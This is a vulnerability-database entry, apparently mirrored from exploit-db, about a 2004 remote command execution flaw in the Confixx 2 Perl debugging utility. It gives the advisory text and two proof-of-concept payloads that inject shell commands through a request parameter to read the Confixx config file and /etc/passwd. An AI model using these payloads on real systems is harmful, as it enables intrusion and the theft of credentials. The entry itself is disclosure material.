Confixx 2 - Perl Debugger Remote Command Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054404 漏洞类型
发布时间 2004-03-09 更新时间 2004-03-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23798
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9831/info

The Confixx PERL debugging utility functionality has been reported to be prone to a remote command execution vulnerability. The issue is reported to occur when a command sequence is appended to a HTTP request for a PERL script resource, the command sequence must contain a prefixed ';' semi-colon character. When this request is processed, the command sequence will be reportedly executed with the privileges of the process that invokes the Confixx PERL debugging utility.

; /bin/cat location_of_Confixx_config_file
http://www.example.com/user/tools_cgicheck2.php?dir=&file=%20./x%20|/bin/cat%20/etc/passwd